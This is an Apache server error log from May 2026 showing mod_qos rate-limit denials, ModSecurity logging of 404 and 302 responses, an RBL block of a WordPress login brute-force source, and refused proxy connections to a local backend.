[Tue May 26 19:53:54.149788 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwfQAAAOs
[Tue May 26 19:53:54.149878 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwfgAAAKk
[Tue May 26 19:53:54.150089 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwfAAAAJk
[Tue May 26 19:53:54.150101 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwgAAAAM8
[Tue May 26 19:53:54.150540 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwfwAAANU
[Tue May 26 19:53:54.151514 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwgQAAAIk
[Tue May 26 19:53:54.152946 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwgwAAAPw
[Tue May 26 19:53:54.153492 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-mDRMqfxdEDkoszMBwAAABM
[Tue May 26 19:53:54.153652 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwhAAAAL0
[Tue May 26 19:53:54.154054 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwggAAAJw
[Tue May 26 19:53:54.164522 2026] [security2:error] [pid 93868:tid 94371] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25FCAAAAgA"]
[Tue May 26 19:53:54.215112 2026] [security2:error] [pid 93868:tid 94293] [client 188.130.142.83:39903] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25FBwAAAbI"], referer: https://anujtradingco.com
[Tue May 26 19:53:54.279928 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv3gAAAKc"]
[Tue May 26 19:53:54.285523 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv1wAAAOw"]
[Tue May 26 19:53:54.289764 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvwgAAAMQ"]
[Tue May 26 19:53:54.295426 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-EqK9k_ZUB2Vp25E4gAAAY8"]
[Tue May 26 19:53:54.304545 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-EqK9k_ZUB2Vp25E5AAAAg4"]
[Tue May 26 19:53:54.305044 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv7gAAALw"]
[Tue May 26 19:53:54.307057 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv5QAAANI"]
[Tue May 26 19:53:54.307365 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25E9wAAAZU"]
[Tue May 26 19:53:54.310981 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv7AAAAMM"]
[Tue May 26 19:53:54.318603 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL3AAAADM"]
[Tue May 26 19:53:54.325980 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL4wAAAH8"]
[Tue May 26 19:53:54.333421 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL5AAAAGM"]
[Tue May 26 19:53:54.339190 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL3QAAAEQ"]
[Tue May 26 19:53:54.340362 2026] [security2:error] [pid 93867:tid 94192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrxwAAAW8"]
[Tue May 26 19:53:54.342665 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwOAAAAMw"]
[Tue May 26 19:53:54.351769 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv1AAAAJA"]
[Tue May 26 19:53:54.351960 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv5wAAAMA"]
[Tue May 26 19:53:54.360663 2026] [security2:error] [pid 93867:tid 94241] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-JCDfrjqoHpuuBKruAAAAYY"]
[Tue May 26 19:53:54.369019 2026] [security2:error] [pid 93867:tid 94057] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrxgAAATE"]
[Tue May 26 19:53:54.371315 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25E-AAAAaQ"]
[Tue May 26 19:53:54.374764 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-EqK9k_ZUB2Vp25E5QAAAZQ"]
[Tue May 26 19:53:54.379698 2026] [security2:error] [pid 93867:tid 94190] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrzgAAAW4"]
[Tue May 26 19:53:54.381321 2026] [security2:error] [pid 93867:tid 94019] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrzwAAAQ8"]
[Tue May 26 19:53:54.395303 2026] [security2:error] [pid 93867:tid 94023] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrzQAAARM"]
[Tue May 26 19:53:54.400361 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KwAwAAAPg"]
[Tue May 26 19:53:54.416972 2026] [security2:error] [pid 93867:tid 94118] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKr0QAAAU4"]
[Tue May 26 19:53:54.422879 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwTAAAANA"]
[Tue May 26 19:53:54.424879 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25E_AAAAfQ"]
[Tue May 26 19:53:54.428856 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwMgAAAOo"]
[Tue May 26 19:53:54.434019 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwQwAAAMc"]
[Tue May 26 19:53:54.454056 2026] [security2:error] [pid 93867:tid 94171] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrywAAAWY"]
[Tue May 26 19:53:54.534359 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-lZMwN0DpLVWo6KwwAAAANM
[Tue May 26 19:53:54.538851 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-kqK9k_ZUB2Vp25FHwAAAgg
[Tue May 26 19:53:54.545887 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwwwAAAJg
[Tue May 26 19:53:54.551214 2026] [security2:error] [pid 93867:tid 93936] [remote 38.95.35.74:48790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWs-pCDfrjqoHpuuBKr5gABZ0E"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:53:54.636727 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwxAAAAMk
[Tue May 26 19:53:54.637209 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-mDRMqfxdEDkoszMHAAAAFQ
[Tue May 26 19:53:54.637215 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-mDRMqfxdEDkoszMGwAAAFc
[Tue May 26 19:53:54.637851 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwxQAAAKA
[Tue May 26 19:53:54.640834 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwxgAAANY
[Tue May 26 19:53:54.641500 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwxwAAAM0
[Tue May 26 19:53:54.641725 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwyQAAAPg
[Tue May 26 19:53:54.769528 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwygAAAP0
[Tue May 26 19:53:54.770211 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-lZMwN0DpLVWo6KwywAAAMU
[Tue May 26 19:53:54.771318 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-mDRMqfxdEDkoszMHQAAAEg
[Tue May 26 19:53:54.922139 2026] [proxy:error] [pid 86490:tid 86645] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:54.922191 2026] [proxy_http:error] [pid 86490:tid 86645] [client 167.71.5.127:54610] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:53:54.922813 2026] [proxy:error] [pid 86490:tid 86645] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:54.922847 2026] [proxy_http:error] [pid 86490:tid 86645] [client 167.71.5.127:54610] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:53:55.213304 2026] [proxy:error] [pid 93868:tid 94357] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:55.213368 2026] [proxy_http:error] [pid 93868:tid 94357] [client 167.71.5.127:54622] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.tickerbell.tech/
[Tue May 26 19:53:55.214000 2026] [proxy:error] [pid 93868:tid 94357] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:55.214033 2026] [proxy_http:error] [pid 93868:tid 94357] [client 167.71.5.127:54622] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.tickerbell.tech/
[Tue May 26 19:53:55.279731 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25E_gAAAeI"]
[Tue May 26 19:53:55.282510 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwVAAAANg"]
[Tue May 26 19:53:55.282737 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwSgAAAOQ"]
[Tue May 26 19:53:55.283929 2026] [security2:error] [pid 93867:tid 94164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKrzAAAAWM"]
[Tue May 26 19:53:55.295912 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-WDRMqfxdEDkoszL_wAAAAI"]
[Tue May 26 19:53:55.298907 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25E_QAAAeE"]
[Tue May 26 19:53:55.300851 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwUgAAAK8"]
[Tue May 26 19:53:55.301821 2026] [security2:error] [pid 86490:tid 86712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwXwAAAOE"]
[Tue May 26 19:53:55.307120 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-WDRMqfxdEDkoszL-wAAACc"]
[Tue May 26 19:53:55.308632 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwSAAAAMY"]
[Tue May 26 19:53:55.315264 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25FAgAAAdE"]
[Tue May 26 19:53:55.317509 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwSQAAAO4"]
[Tue May 26 19:53:55.326517 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMDAAAADw"]
[Tue May 26 19:53:55.334918 2026] [security2:error] [pid 93867:tid 94112] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKr1QAAAUs"]
[Tue May 26 19:53:55.335227 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwSwAAAI8"]
[Tue May 26 19:53:55.346351 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwUwAAANo"]
[Tue May 26 19:53:55.359383 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwXgAAALQ"]
[Tue May 26 19:53:55.362175 2026] [security2:error] [pid 93867:tid 94065] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-pCDfrjqoHpuuBKr4gAAATU"]
[Tue May 26 19:53:55.367892 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwmQAAAPM"]
